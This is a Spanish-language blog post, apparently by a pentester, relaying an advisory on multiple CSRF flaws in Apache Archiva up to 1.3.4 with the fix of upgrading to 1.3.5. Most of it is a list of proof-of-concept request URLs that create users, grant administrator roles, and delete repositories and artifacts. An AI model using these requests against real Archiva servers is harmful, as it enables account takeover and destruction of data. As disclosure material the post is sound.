Otra Vulnerabilidad en Apache

 

Noticias, Updates, de Seguridad

#Apache #Archiva Multiple #CSRF #vulnerabil​ities

Esto es con respecto a múltiples CSRF (Cross Site Request Forgery) Vulnerabilidades en Apache Archiva 1.3.4 (y versiones anteriores).
Proyecto: Archiva Apache
Severidad: Alta
Versiones: 1.3.0 – 1.3.4. Las versiones no compatibles Archiva 1.0 – 1.2.2
también se ven afectados.
Tipo Exploit: Múltiples CSRF
Mitigación: Archiva 1.3.4 y anteriores usuarios deben actualizar a 1.3.5
Dirección del vendedor: http://archiva.apache.org/security.html
CVE: CVE-ID-2011-1026

Detalles de la vulnerabilidad:
Estos aspectos permiten a un atacante acceder y utilizar la aplicación con la sesión de un usuario con sesión iniciada. En este caso, un atacante puede construir una simple página HTML que contiene una imagen oculta con etiquetas
(por ejemplo: src=vulnurl <img width=0 height=0 />) y atraer al administrador
para acceder a la página y robar su identidad.

http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.username=tester123&user.fullName=test&user.email=test%40test.com&user.password=abc&user.confirmPassword=abchttp://127.0.0.1:8080/archiva/security/userdelete!submit.action?username=test

http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=test&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_addNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repository+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&submitRolesButton=Submit

http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&method%3AdeleteContents=Delete+Configuration+and+Contents

http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&artifactId=1&version=1&repositoryId=snapshots

http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repositoryGroup.id=csrfgrp

http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGroupId=test&method%3Adelete=Confirm

http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action?target=maven2-repository.dev.java.net&source=internal

http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?target=maven2-repository.dev.java.net&source=snapshots

http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path=jaxen%2Fjars%2Fjaxen-1.0-FCS-full.jar

http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&proxy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.username=&proxy.password=

http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?proxyid=myproxy

http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePattern.action?pattern=**%2F*.rum&fileTypeId=artifacts

http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePattern.action?pattern=**%2F*.rum&fileTypeId=artifacts

http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsumers.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentConsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksums&enabledKnownContentConsumers=index-content&enabledKnownContentConsume

rs=metadata-updater&enabledKnownContentConsumers=repository-purge&enabledKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=validate-checksums

http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers.action?enabledUnprocessedConsumers=update-db-project

http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.action?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanupConsumers=not-present-remove-db-project&enabledCleanupConsumers=not-present-remove-indexed

Reciban un cordial Saludo.

Tags: , , , , ,

Professional Ethical Hacker, Pentester & Forensics Investigator MPCS, CEH v8, CSSP, CICP-CICAP HTCIA Member & ISECOM Member Twitter: @victormirandamx

March 2024
M T W T F S S
 123
45678910
11121314151617
18192021222324
25262728293031